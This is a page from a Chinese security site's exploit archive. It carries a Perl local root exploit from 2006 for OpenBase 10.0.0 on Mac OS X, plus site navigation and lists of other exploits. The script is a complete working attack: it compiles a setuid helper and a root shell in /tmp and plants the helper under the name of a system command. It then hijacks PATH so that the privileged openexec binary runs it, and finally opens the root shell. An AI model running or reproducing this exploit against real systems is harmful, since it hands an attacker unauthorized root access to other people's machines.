首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Xcode OpenBase <= 10.0.0 (unsafe system call) Local Root Exploit (OSX)
来源:http://www.digitalmunition.com 作者:kf 发布时间:2006-11-09  

#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# <= ftp://www.openbase.com/pub/OpenBase_10.0 (vulnerable) ?
#
# This is some fairly blatant and retarded use of system()
#
# cd cp chmod chown rm mkdir and killall appear as strings in the binary hrmm can you cay system() !
# -restart -MachLaunch -launch -noexit -install_plugins -kill -install -uninstall and -deactivate all
# *may* be used to trigger these issues.
#
# I don't feel like seeing which flags call which binaries... just 3 is plenty to prove the point.
#
# Tested against OpenBase10.0.0_MacOSX.dmg

$binpath = "/Library/OpenBase/bin/openexec"; # Typical location.

$tgts{"0"} = "cp:$binpath -install";
$tgts{"1"} = "killall:$binpath -kill";
$tgts{"2"} = "rm:$binpath -uninstall";

unless (($target) = @ARGV) {
print "\n\nUsage: $0 <target> \n\nTargets:\n\n";

foreach $key (sort(keys %tgts)) {
($a,$b) = split(/\:/,$tgts{"$key"});
print "\t$key . $a - $b\n";
}

print "\n";
exit 1;
}

$ret = pack("l", ($retval));
($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $a - $b\n";

open(OP,">/tmp/finisterre.c");
printf OP "main()\n";
printf OP "{ seteuid(0); setegid(0); setuid(0); setgid(0); system(\"chown root: /tmp/pwns ; chmod 4775 /tmp/pwns\"); }\n";

open(OP,">/tmp/pwns.c");
printf OP "main()\n";
printf OP "{ seteuid(0); setegid(0); setuid(0); setgid(0); system(\"/bin/sh -i\"); }\n";

system("gcc -o /tmp/finisterre /tmp/finisterre.c");
system("gcc -o /tmp/pwns /tmp/pwns.c");

system("echo /bin/cp /tmp/finisterre /tmp/$a");
system("/bin/cp /tmp/finisterre /tmp/$a");

system("export PATH=/tmp:\$PATH; $b");
system("/tmp/pwns");




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Xcode OpenBase <= 10.0.0 (s
·MS Internet Explorer 6/7 (XML
·WFTPD Pro Server 3.23.1.1 (APP
·AspPired2Poll <= 1.0 (MoreI
·WarFTPd 1.82.00-RC11 Remote De
·phpwcms <= 1.2.6 (Cookie: w
·iPrimal Forums (admin/index.ph
·PHPWind <= 5.0.1 (AdminUser
·OpenLDAP 2.2.29 Remote Denial
·Rama CMS <= 0.68 (Cookie: l
·Omni-NFS Server 5.2 (nfsd.exe)
·Munch Pro 1.0 (switch.asp) Rem
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved